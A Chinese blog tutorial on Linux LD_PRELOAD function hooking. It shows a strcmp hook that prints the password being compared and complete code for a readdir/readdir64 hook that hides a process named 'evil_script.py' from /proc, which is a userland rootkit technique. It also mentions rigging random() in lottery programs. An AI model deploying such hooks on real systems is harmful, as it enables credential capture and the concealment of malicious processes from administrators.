Linux LD_PRELOAD Hook

已于 2023-10-09 17:23:41 修改
阅读量468 收藏
点赞数 1
分类专栏: 二进制分析与安全 文章标签: linux
于 2023-10-09 16:37:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SGchi/article/details/133707355
版权

文章目录

一、简介

  loader在进行动态链接的时候,会将有相同符号名的符号覆盖成LD_PRELOAD指定的so文件中的符号。换句话说,可以用我们自己的so库中的函数替换原来库里有的函数,从而达到hook的目的。这和Windows下通过修改import table来hook API很类似。相比较之下,LD_PRELOAD更方便了,都不用自己写代码了,系统的loader会帮我们搞定。但是LD_PRELOAD有个限制:只能hook动态链接的库,对静态链接的库无效,因为静态链接的代码都写到可执行文件里了嘛,没有坑让你填。

二、hook strcmp

  先是受害者,我们的主程序main.c,通过strcmp比较字符串是否相等:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    if( strcmp(argv[1], "test") )
    {
        printf("Incorrect password\n");
    }
    else
    {
        printf("Correct password\n");
    }
    return 0;
}

然后是用来hook的库hook.c:

#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
 
typedef int(*STRCMP)(const char*, const char*);
 
int strcmp(const char *s1, const char *s2)
{
    static void *handle = NULL;
    static STRCMP old_strcmp = NULL;
 
    if( !handle )
    {
        handle = dlopen("libc.so.6", RTLD_LAZY);
        old_strcmp = (STRCMP)dlsym(handle, "strcmp");
    }
    printf("hack function invoked. s1=<%s> s2=<%s>\n", s1, s2);
    return old_strcmp(s1, s2);
}

因为hook的目标是strcmp,所以typedef了一个STRCMP函数指针。由于hook的目的是要控制函数行为,所以需要从原库libc.so.6中拿到“正版”strcmp指针,保存成old_strcmp以备调用。

Makefile:
 
test: main.c hook.so
    gcc -o test main.c
 
hook.so: hook.c
    gcc -fPIC -shared -o hook.so hook.c -ldl

执行:

$ LD_PRELOAD=./hook.so ./test 123
hack function invoked. s1=<123> s2=<test>
Incorrect password
 
$ LD_PRELOAD=./hook.so ./test test
hack function invoked. s1=<test> s2=<test>
Correct password

  使用PRE_LOAD劫持库函数的这种做法可以做很多事情,比如劫持随机函数random, random_r等,使得看起来是公平的摇号程序可以自如地由自己控制;比如实现一些高级功能,zlibc就是使用这个技术来做压缩,但是上层应用对其完全无感知;比如紧急fixbug,你可以preload一个函数库来使你的有bug的程序如期运行;比如访问应用程序的内存,做一些你想做的事 😃

LD_PRELOAD hook步骤:

  1. 定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等
  2. 将包含替换函数的源码编译为动态链接库
  3. 通过命令 export LD_PRELOAD="库文件路径",设置要优先替换动态链接库
  4. 如果找不替换库,可以通过 export LD_LIBRARY_PATH=库文件所在目录路径,设置系统查找库的目录
  5. 替换结束,要还原函数调用关系,用命令unset LD_PRELOAD 解除
  6. 想查询依赖关系,可以用ldd 程序名称

三、hook readdir 实现隐藏进程

这里直接贴上代码,感兴趣的同学可以参考下面的链接:

#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";

/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}

#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, "readdir");               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

参考链接:

SGchi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux应用hook实例(含源码分析)
啊渊的专栏
08-12 2544
函数地址替换是最简单的hook方式,在开发的时候发现C开发的程序和C++开发的程序hook还是有差别的。C开发的程序函数几乎是可以直接使用readelf查看,因此在查找函数偏移量的时候相对简单一些,但是如果是C++开发无法直接使用readelf命令查看函数地址,因此需要动态跟踪函数地址,找到函数偏移量然后针对该函数地址进行hook。..............................
Android API HookLD_PRELOAD
04-05
安卓挂钩子 hook技术 详细讲解了如何挂钩android api
利用LD_PRELOAD进行hook
THE YEAR的专栏
02-16 911
loader在进行动态链接的时候,会将有相同符号名的符号覆盖成LD_PRELOAD指定的so文件中的符号。换句话说,可以用我们自己的so库中的函数替换原来库里有的函数,从而达到hook的目的。这和Windows下通过修改import table来hook API很类似。相比较之下,LD_PRELOAD更方便了,都不用自己写代码了,系统的loader会帮我们搞定。但是LD_PRELOAD有个限制:只
利用LD_PRELOAD hook代码
weixin_34160277的博客
08-01 126
     loader在进行动态链接的时候,会将有相同符号名的符号覆盖成LD_PRELOAD指定的so文件中的符号。换句话说,可以用我们自己的so库中的函数替换原来库里有的函数,从而达到hook的目的。这和Windows下通过修改import table来hook API很类似。相比较之下,LD_PRELOAD更方便了,都不用自己写代码了,系统的loader会帮我们搞定。但是LD_PRELOAD有...
一种简单的hook方法--LD_PRELOAD变量
weixin_30443813的博客
02-19 270
LD_PRELOAD这个变量允许你定义在程序运行时优先加载的动态链接库,从而在程序运行时的动态链接 下面程序的看一个例子-getuid.c //getuid.c #include<stdio.h> #include<unistd.h> #include<sys/types.h> int main(void) { printf("my ...
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
这里的"PRELOAD:LD_PRELOAD rootkit实用程序"是指利用`LD_PRELOAD`环境变量来加载一个自定义的动态链接库(`.so`文件),从而在系统调用层面进行hook或注入代码,实现对目标程序的控制或监控。这在某些情况下可以...
使用LD_PRELOAD注入程序.pdf
04-26
linux 如何hook 任何一个目标文件中 使用的 第一层函数。在没有目标源码的情形下。对目标进行hook、 亲测,可以用
inotify-mitm:LD_PRELOAD挂钩,用于将网络事件转移到Linux
05-20
使木乃伊化这是尝试挂接inotify调用的实验,...例子make allLD_PRELOAD= $PWD /inotify_hook.so inotifywait -m -r -e modify,attrib,close_write,move,create,delete /tmp 然后在另一个外壳中: touch /tmp/llamas参考
fba_hook_driver.zip_LINUX__LINUX_
08-09
"fba_hook_driver.zip_LINUX__LINUX_"这个压缩包显然与Linux操作系统下的驱动程序挂钩技术有关,可能是为了在Linux环境下对游戏(FBA,Full Blast Arcade的缩写,是一个多平台的街机游戏模拟器)进行调试或者性能...
c++钩子函数:copy hook_linux函数hook
12-27
总结来说,"c++钩子函数:copy hook_linux函数hook"是一个C++项目,它在Linux环境下实现了文件复制操作的监控和控制,可能通过内核模块、用户空间钩子或两者结合的方式。项目使用了ATL库来创建COM接口,并提供了类型...
C++使用LD_PRELOAD劫持(Hook)库函数
~码农小非~的专栏
07-10 2386
更多文章欢迎访问 程序员小非 博客 在调试C++程序的时候,我们并不是每次都能拿到源代码,很多时候我们只能得到一个动态库so,调试时这个动态库就是一个黑匣子,没办法查看修改或者在里面加日志,那么我们是不是就没有任何办法对我们感兴趣的函数和参数进行监控和跟踪了呢? 对于这种情况,我们一般会挂上gdb,然后在我们感兴趣的地方打上断点,然后查看堆栈里的变量的值。但这个过程时比较繁琐的,尤其是在需要了...
[LINUX]LD_PRELOAD中对于dlopen函数的hook
小蜗牛之家
04-08 956
- LD_PRELOADhook方式可以hook大部分的函数,通常需要通过dlopen获取共享库的句柄,然后用dlsym获取对应名称的函数地址, 用于后续调用; - 这种方式对于绝大多数的libc暴露的函数均有效,但是对于dlopen这种机制中需要使用的函数无法进行hook,因为一旦hook了dlopen函数,则会在获取共享库句柄的时候,陷入死循环; - 解决方式:自主编译libc,建立一个...
巧用 c 库 preload hook 技术定位 systemd 服务启动异常问题
龙瑜的博客
10-17 299
在系统启动的时候,/var/run、/run 目录的创建顺序影响某 systemd 服务的正常启动,需要确定是谁创建了这两个目录以定位问题。 由于此问题在 systemd 服务启动过程中触发,不能使用 auditd 等工具监测,于是想到通过 hook c 库中目录创建与软链接创建相关函数来记录日志以找到犯罪服务,在本文中记录一下。
[C/C++]利用preload hook截获进程操作
小蜗牛之家
07-28 1376
利用linux preload so功能,改写一些glibc中的系统调用,实现监控对文件系统操作的功能。 方法: 生成自己的xxx.so,在运行程序前加上LD_PRELOAD=xxx.so 例如:需要监控某个进程试图打开的文件? #include <dlfcn.h> #include "util.h" #include "unistd.h" using namespace std...
linux LD_PRELOAD 预加载 so 简介
whatday的专栏
09-30 1万+
预加载so的两种方式: 修改/etc/ld.so.preload配置文件,这种方法对配置修改之后运行的进程生效,而无法影响已经在运行的进程; 启动进程前设置LD_PRELOAD变量(如shell中执行LD_PRELOAD=/lib64/inject.so ./myprocess),则只对当前进程生效。 默认情况下进程创建的子进程也会继承Preload环境变量,而父进程可以在子进程初始化前修改子进程的环境变量,从而避免往子代传播。 LD_PRELOAD可以影响程序的运行时的链接,它允许你定义在程序运行前
LinuxLD_PRELOAD用法
Making Life Better. Making Others Better.
11-20 2万+
LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为LD_PRELOAD&gt;LD_LIBRARY_PATH&gt;/etc/ld.so.cache&gt;/lib&gt;/usr/lib。程序中我们经常要调用一些外部库的函数,以malloc为例,如果我们有个自定义的malloc函数,把它编译成动态库后,通过LD_PRELOAD加载,当程序中调用malloc函数时,调用的
strcmp函数详解:字符串【比较】的利器
热门推荐
天行健、君子以自强不息
10-10 3万+
strcmp函数详解及模拟实现
Hook技术--②LD_PRELOAD
一些个人笔记,写的不好之处,还请海涵
10-31 227
定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等。将包含替换函数的源码编译为动态链接库。通过命令export LD_PRELOAD="库文件路径",设置要优先替换动态链接库。如果找不替换库,可以通过export LD_LIBRARY_PATH=库文件所在目录路径,设置系统查找库的目录。替换结束,要还原函数调用关系,用命令解除想查询依赖关系,可以用ldd 程序名称。共享库必须是可执行文件,即必须具有x权限。共享库必须是使用-fPIC编译的,以避免地址重定位问题。
linux dns hook
最新发布
03-02
Linux DNS Hook是一种在Linux系统中实现DNS请求拦截和修改的技术。通过使用DNS Hook,可以在DNS请求到达系统之前或者离开系统之后对DNS数据进行修改或者拦截。 DNS Hook的实现方式通常是通过内核模块或者LD_PRELOAD技术来实现的。下面是一种可能的实现方式: 1. 内核模块:通过编写一个内核模块,将其加载到Linux内核中。该模块可以通过注册一个钩子函数来拦截DNS请求。当有DNS请求到达系统时,钩子函数会被触发,可以在这个函数中对DNS数据进行修改或者拦截。 2. LD_PRELOADLD_PRELOAD是一种环境变量,可以用来指定在程序加载时要预先加载的共享库。通过编写一个共享库,并将其设置为LD_PRELOAD环境变量,可以在程序运行时拦截和修改DNS请求。在共享库中,可以使用LD_PRELOAD技术来替换系统的DNS解析函数,从而实现对DNS请求的拦截和修改。 使用Linux DNS Hook技术可以实现一些有用的功能,比如实现域名屏蔽、实现自定义的DNS解析策略、实现DNS缓存等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值